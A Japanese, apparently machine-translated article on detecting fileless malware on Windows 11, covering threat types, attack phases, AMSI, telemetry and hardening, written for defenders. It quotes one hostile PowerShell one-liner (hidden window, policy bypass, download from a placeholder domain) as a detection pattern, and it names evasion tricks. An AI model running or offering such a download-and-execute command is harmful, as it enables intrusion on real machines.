Windows 11で危険なファイルレスマルウェアを検出する方法

¿危険なファイルレスマルウェアを検出するにはどうすればいいですか? ファイルレス攻撃活動は著しく増加しており、さらに悪いことに、 Windows 11も例外ではないこのアプローチはディスクを迂回し、メモリと正規のシステムツールに依存します。そのため、シグネチャベースのウイルス対策プログラムは対応しきれません。確実な検出方法をお探しなら、以下の2つを組み合わせるのが答えです。 テレメトリ、行動分析、Windows コントロール.

現在のエコシステムでは、PowerShell、WMI、またはMshtaを悪用するキャンペーンは、メモリインジェクション、ディスクに「触れずに」永続化、さらには ファームウェアの悪用重要なのは、脅威マップ、攻撃フェーズ、そしてすべてが RAM 内で発生した場合でもどのような信号が残されるかを理解することです。

ファイルレス マルウェアとは何ですか? また、Windows 11 でなぜ問題になるのですか?

「ファイルレス」の脅威について話すとき、私たちは悪意のあるコードについて言及しています。 新しい実行ファイルを預ける必要はありません ファイルシステム内で動作するために必要です。通常、実行中のプロセスに注入され、Microsoftによって署名されたインタープリタとバイナリ（例： PowerShell、WMI、rundll32、mshtaこれによりフットプリントが削減され、疑わしいファイルのみを検索するエンジンをバイパスできるようになります。

脆弱性を悪用してコマンドを実行するオフィス文書やPDFも、この現象の一部であると考えられる。 メモリ内で実行をアクティブ化する 分析に有用なバイナリを残さずに マクロとDDE Office では、コードは WinWord などの正当なプロセスで実行されるためです。

攻撃者はソーシャルエンジニアリング（フィッシング、スパムリンク）と技術的な罠を組み合わせて、ユーザーがクリックするとスクリプトがダウンロードされ、メモリ内の最終ペイロードが実行されるという連鎖反応を開始します。 痕跡を残さないようにする ディスク上のデータ窃盗からランサムウェアの実行、そしてサイレントな横方向の移動まで、その目的は多岐にわたります。

システムにおけるフットプリントによる類型：「純粋」からハイブリッドまで

概念の混乱を避けるために、脅威をファイルシステムとの相互作用の程度によって分類すると便利です。この分類により、 何が残り、コードはどこに存在し、どのような痕跡を残すのでしょうか?.

タイプI: ファイルアクティビティなし

完全にファイルレスなマルウェアはディスクに何も書き込みません。典型的な例としては、 ネットワークの脆弱性 （かつてのEternalBlueベクターのように）カーネルメモリ内にバックドアを実装する（DoublePulsarのようなケース）。この場合、すべてがRAM内で行われ、ファイルシステムにアーティファクトは発生しません。

もう一つの選択肢は、 ファームウェア BIOS/UEFI、ネットワークアダプター、USB周辺機器（BadUSBのような手法）、さらにはCPUサブシステムなど、コンポーネントの脆弱性が存在します。これらの脆弱性は再起動や再インストールを行っても解消されず、さらに問題が深刻化します。 ファームウェアを検査する製品は少ないこれらは複雑な攻撃であり、頻度は低いですが、ステルス性と耐久性が高いため危険です。

タイプII：間接的なアーカイブ活動

ここでは、マルウェアは自身の実行ファイルを「残す」のではなく、システム管理のコンテナ（基本的にはファイルとして保存されている）を使用します。例えば、バックドアは PowerShellコマンド WMIリポジトリに侵入し、イベントフィルターで実行をトリガーします。バイナリをドロップせずにコマンドラインからインストールすることは可能ですが、WMIリポジトリは正規のデータベースとしてディスク上に常駐するため、システムに影響を与えずにクリーンアップすることは困難です。

実用的な観点から見ると、コンテナー (WMI、レジストリなど) はファイルレスであると考えられます。 これは典型的な検出可能な実行ファイルではない そして、そのクリーンアップは容易ではありません。その結果、「従来型」の痕跡をほとんど残さずに、ステルス的に存続することになります。

タイプIII: ファイルが機能する必要がある

いくつかのケースでは、 「ファイルレス」永続性 論理レベルでは、ファイルベースのトリガーが必要です。典型的な例はKovterです。Kovterはランダムな拡張子のシェル動詞を登録し、その拡張子のファイルが開かれると、mshta.exeを使用した小さなスクリプトが起動され、レジストリから悪意のある文字列を再構築します。

問題は、ランダムな拡張子を持つこれらの「おとり」ファイルには分析可能なペイロードが含まれておらず、コードの大部分は 登録 （別のコンテナ）。厳密に言えば、トリガーとして1つ以上のディスクアーティファクトに依存しているにもかかわらず、影響度はファイルレスとして分類されるのはそのためです。

感染の媒介者と「宿主」：侵入場所と潜伏場所

検出率を向上させるには、感染の侵入地点と宿主をマッピングすることが不可欠です。この視点は、設計に役立ちます。 特定のコントロール 適切なテレメトリを優先します。

悪用

• ファイルベース (タイプIII): ドキュメント、実行ファイル、レガシーFlash/Javaファイル、またはLNKファイルは、ブラウザまたはそれらを処理するエンジンを悪用してシェルコードをメモリにロードする可能性があります。最初のベクトルはファイルですが、ペイロードはRAMに移動します。
• ネットワークベース （タイプI）：脆弱性（例：SMB）を悪用するパッケージが、ユーザーランドまたはカーネル内で実行されます。WannaCryはこのアプローチを普及させました。 直接メモリロード 新しいファイルなし。

Hardware

• デバイス (タイプI): ディスクまたはネットワークカードのファームウェアが改ざんされ、コードが侵入される可能性があります。検査が困難で、OSの外部にも残存します。
• CPUと管理サブシステム （タイプI）：インテルのME/AMTなどの技術は、 OS外でのネットワークと実行非常に低いレベルで攻撃しますが、ステルス性は高い可能性があります。
• USB (タイプ I): BadUSB を使用すると、USB ドライブを再プログラムしてキーボードまたは NIC を偽装し、コマンドを起動したりトラフィックをリダイレクトしたりすることができます。
• BIOS / UEFI (タイプ I): Windows の起動前に実行される悪意のあるファームウェアの再プログラミング (Mebromi などのケース)。
• ハイパーバイザー (タイプI): OSの下にミニハイパーバイザーを実装し、OSの存在を隠蔽する。稀ではあるが、ハイパーバイザールートキットの形で既に確認されている。

実行と注入

• ファイルベース (タイプ III): 正当なプロセスにインジェクションを開始する EXE/DLL/LNK またはスケジュールされたタスク。
• マクロ (タイプ III): Office の VBA は、欺瞞を通じてユーザーの同意を得て、完全なランサムウェアを含むペイロードをデコードして実行できます。
• スクリプト (タイプ II): PowerShell、VBScript、または JScript (ファイル、コマンドラインから) サービス、登録、またはWMI攻撃者はディスクに触れることなくリモート セッションでスクリプトを入力できます。
• ブートレコード（MBR/ブート） (タイプII): Petyaのようなマルウェアファミリーは、起動時に制御権を奪取するためにブートセクターを上書きします。ブートセクターはファイルシステム外にありますが、OSや最新の復元ソリューションからアクセスできます。

ファイルレス攻撃の仕組み：フェーズとシグナル

実行ファイルは残さないものの、キャンペーンは段階的なロジックに従って実行されます。これらを理解することで、監視が可能になります。 イベントとプロセス間の関係 それは痕跡を残します。

• 初期アクセスリンクや添付ファイル、侵害されたウェブサイト、盗まれた認証情報などを利用したフィッシング攻撃。多くの攻撃チェーンは、コマンドをトリガーするOfficeドキュメントから始まります。 PowerShellの.
• 永続性: WMI経由のバックドア（フィルターとサブスクリプション） レジストリ実行キー または、新しい悪意のあるファイルなしでスクリプトを再起動するスケジュールされたタスク。
• 流出情報が収集されると、信頼できるプロセス (ブラウザ、PowerShell、bitsadmin) を使用してネットワーク外に送信され、トラフィックが混合されます。

このパターンは特に陰険で、 攻撃指標 これらは、コマンドライン引数、プロセス連鎖、異常な送信接続、インジェクション API へのアクセスなど、通常の状態に隠れています。

一般的なテクニック：記憶から記録まで

俳優たちは様々な メソッド ステルス性を最適化するもの。効果的な検出を行うには、最も一般的なものを知っておくと役立ちます。

• 記憶に残る: アクティベーションを待機する信頼できるプロセスのスペースにペイロードをロードします。 ルートキットとフック カーネルでは、隠蔽レベルを上げます。
• レジストリの永続性暗号化されたBLOBをキーに保存し、正規のランチャー（mshta、rundll32、wscript）から復元します。一時インストーラーは自己破壊することで、ファイルサイズを最小限に抑えることができます。
• 認証情報フィッシング盗んだユーザー名とパスワードを使って攻撃者はリモートシェルを実行し、 サイレントアクセス レジストリまたは WMI で。
• 「ファイルレス」ランサムウェア暗号化と C2 通信は RAM から調整されるため、被害が明らかになるまで検出される機会が減少します。
• 手術キット: ユーザーがクリックした後に脆弱性を検出し、メモリのみのペイロードを展開する自動化されたチェーン。
• コード付き文書: 実行可能ファイルをディスクに保存せずにコマンドをトリガーするマクロおよび DDE などのメカニズム。

業界の調査ではすでに注目すべきピークが示されています。2018年のある期間では、 90%以上の増加 スクリプトベースおよび PowerShell チェーン攻撃では、その有効性からこのベクトルが好まれることを示しています。

企業とサプライヤーの課題：ブロックだけでは不十分な理由

PowerShellを無効にしたり、マクロを永久に禁止したりすることは魅力的ですが、 操作を中断することになりますPowerShell は現代の管理の柱であり、Office はビジネスに不可欠なため、盲目的にブロックすることは多くの場合不可能です。

さらに、基本的な制御を回避する方法があります。DLLやrundll32を介してPowerShellを実行したり、スクリプトをEXEにパッケージ化したり、 PowerShellのコピーを持参する あるいは、スクリプトを画像内に隠してメモリに抽出するといったことも可能です。したがって、ツールの存在を否定するだけでは、防御の根拠にはなりません。

よくある間違いの1つは、すべての決定をクラウドに委任することです。エージェントがサーバーからの応答を待たなければならない場合、 リアルタイムの予防が失われるテレメトリデータをアップロードして情報を充実させることはできるが、 緩和はエンドポイントで実行する必要がある.

Windows 11でファイルレスマルウェアを検出する方法：テレメトリと動作

勝利の戦略は プロセスとメモリを監視するファイルではありません。悪意のある動作はファイルの形式よりも安定しているため、防止エンジンに最適です。

• AMSI (マルウェア対策スキャンインターフェース)PowerShell、VBScript、JScriptスクリプトがメモリ内で動的に構築されている場合でも、インターセプトします。難読化された文字列を実行前に捕捉するのに最適です。
• プロセス監視: スタート/フィニッシュ、PID、親と子、ルート、 コマンドライン 全体像を理解するには、ハッシュと実行ツリーもご覧ください。
• 記憶分析: ディスクに触れることなく、インジェクション、反射、または PE ロードを検出し、異常な実行可能領域を確認します。
• スターターセクター保護: 改ざんされた場合の MBR/EFI の制御と復元。

マイクロソフトのエコシステムでは、Defender for EndpointはAMSIと 行動監視メモリスキャンとクラウドベースの機械学習は、新しい亜種や難読化された亜種に対する検出能力を高めるために活用されています。他のベンダーもカーネル常駐エンジンを用いて同様のアプローチを採用しています。

相関関係の現実的な例: ドキュメントから PowerShell へ

Outlookが添付ファイルをダウンロードし、Wordが文書を開き、アクティブコンテンツが有効になり、PowerShellが疑わしいパラメータで起動されるという一連の動作を想像してみてください。適切なテレメトリがあれば、 コマンドライン (例: ExecutionPolicy バイパス、非表示のウィンドウ)、信頼されていないドメインに接続し、AppData に自身をインストールする子プロセスを作成します。

ローカルコンテキストを持つエージェントは、 停止して後退する SIEMやメール/SMSへの通知に加え、手動介入なしに悪意のあるアクティビティを検知します。一部の製品では、目に見えるプロセス（Outlook/Word）ではなく、根本原因アトリビューションレイヤー（ストーリーライン型モデル）が追加されています。 完全な悪意のあるスレッド そしてその起源を徹底的にシステムをクリーンアップします。

注意すべき典型的なコマンドパターンは次のようになります。 powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');ロジックは正確な文字列ではありませんが、 信号のセット: ポリシーバイパス、非表示ウィンドウ、クリアダウンロード、メモリ内実行。

AMSI、パイプライン、各アクターの役割：エンドポイントからSOCまで

スクリプトのキャプチャだけでなく、堅牢なアーキテクチャにより、調査と対応を容易にする手順が調整されます。 ロードを実行する前に証拠が多ければ多いほど良いです。より良い

• スクリプトインターセプションAMSI は、マルウェア パイプラインでの静的および動的分析のために、コンテンツ (オンザフライで生成されたものも含む) を配信します。
• プロセスイベントPID、バイナリ、ハッシュ、ルート、その他のデータが収集されます。 引数最終的なロードにつながるプロセス ツリーを確立します。
• 検出と報告検出結果は製品コンソールに表示され、キャンペーンの視覚化のためにネットワーク プラットフォーム (NDR) に転送されます。
• ユーザー保証スクリプトがメモリに挿入されたとしても、フレームワークは AMSIがそれを傍受する 互換性のあるバージョンの Windows で。
• 管理者の権限: スクリプト検査を有効にするポリシー設定、 行動ベースのブロック コンソールからレポートを作成します。
• SOC作業: アーティファクト（VM UUID、OSバージョン、スクリプトタイプ、イニシエータープロセスとその親、ハッシュとコマンドライン）を抽出して履歴を再現し、 リフトのルール 未来。

プラットフォームがエクスポートを許可している場合 メモリバッファ 実行に関連して、研究者は新たな検出を生成し、同様の変種に対する防御を強化できます。

Windows 11の実践的な対策：予防とハンティング

Windows 11では、メモリ検査とAMSIを備えたEDRに加えて、攻撃空間を遮断し、可視性を向上させることができます。 ネイティブコントロール.

• PowerShell での登録と制限スクリプトブロックログとモジュールログを有効にし、可能な場合は制限モードを適用し、 バイパス/隠し.
• 攻撃対象領域縮小（ASR）ルール: Officeプロセスによるスクリプトの起動をブロックし、 WMIの乱用必要ない場合は /PSExec を実行します。
• Office マクロポリシー: デフォルトでは、内部マクロ署名と厳密な信頼リストを無効にし、従来の DDE フローを監視します。
• WMI監査とレジストリ: イベントサブスクリプションと自動実行キー（Run、RunOnce、Winlogon）、およびタスク作成を監視します。 予定.
• 起動保護: セキュア ブートをアクティブ化し、MBR/EFI の整合性をチェックし、起動時に変更がないことを検証します。
• パッチ適用と強化: ブラウザ、Office コンポーネント、ネットワーク サービスにおける悪用可能な脆弱性を修正します。
• 意識: ユーザーと技術チームにフィッシングとその兆候に関するトレーニングを提供します 秘密処刑.

ハンティングでは、PowerShell/MSHTA向けのOfficeによるプロセスの作成、 ダウンロード文字列/ダウンロードファイル明らかな難読化、リフレクションインジェクション、疑わしいTLDへのアウトバウンドネットワークを含むスクリプト。これらのシグナルをレピュテーションや頻度と相互参照することで、ノイズを削減します。

現在、各エンジンは何を検出できますか?

マイクロソフトのエンタープライズソリューションは、AMSI、行動分析、 記憶を調べる ブートセクター保護に加え、クラウドベースの機械学習モデルにより、新たな脅威への対応を強化しています。他のベンダーは、カーネルレベルの監視を実装し、悪意のあるソフトウェアと無害なソフトウェアを区別し、変更を自動的にロールバックします。

に基づくアプローチ 処刑物語 これにより、根本原因 (たとえば、チェーンをトリガーする Outlook 添付ファイル) を特定し、目に見える症状にとらわれずに、スクリプト、キー、タスク、中間バイナリなど、ツリー全体を軽減することができます。

よくある間違いとその回避方法

代替の管理プランなしでPowerShellをブロックすることは非現実的であるだけでなく、 間接的に呼び出す方法マクロについても同様です。ポリシーとシグネチャで管理しなければ、ビジネスに支障をきたします。テレメトリと動作ルールに重点を置く方が良いでしょう。

もう 1 つのよくある間違いは、アプリケーションをホワイトリスト化すればすべてが解決すると考えることです。ファイルレス テクノロジーはまさにこれに依存しています。 信頼できるアプリ制御では、許可されているかどうかだけでなく、それらが何を実行し、どのように関連しているかを観察する必要があります。

上記のすべてを踏まえて、本当に重要なものを監視すれば、ファイルレス マルウェアは「幽霊」ではなくなります。 行動、記憶、起源 各実行のセキュリティレベルを測ります。AMSI、豊富なプロセステレメトリ、Windows 11ネイティブコントロール、そしてEDRレイヤーと行動分析を組み合わせることで、優位性が得られます。さらに、マクロとPowerShellに関する現実的なポリシー、WMI/レジストリ監査、そしてコマンドラインとプロセスツリーを優先するハンティングを活用すれば、攻撃チェーンが音を立てる前に遮断する防御策が実現します。